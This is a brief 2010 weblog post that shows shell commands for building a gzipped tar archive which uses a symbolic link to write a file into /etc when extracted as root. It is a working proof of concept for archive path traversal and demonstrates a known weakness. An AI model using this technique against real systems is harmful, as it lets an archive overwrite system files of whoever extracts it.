The Shœstring Foundation Weblog

The Shœstring Foundation Weblog, Miscellaneous Byproducts

Matthias Bauer
bauerm (at) shoestringfoundation · org
reop pubkey
Vignettes by George Herriman and a small program

Subscribe to a syndicated feed of my weblog, brought to you by the wonders of RSS.

Blosxom Logo

Mon, 06 Sep 2010

A .tgz that bytes

The following creates a tar file that writes stuff (/etc/yourpasswd in this case) outside the directory where it is extracted:
touch foo.c bar.c Makefile
ln -s /etc info                      # tar can do symbolic links
tar cf src.tar *.c Makefile info
rm info
mkdir info
touch info/yourpasswd                # where does this extract?
tar rf src.tar info/yourpasswd       # tar can extend archives
gzip -9 src.tar
This of course only works when tar zxf is run as root, but that is not unheard of, right?

[/projects] permanent link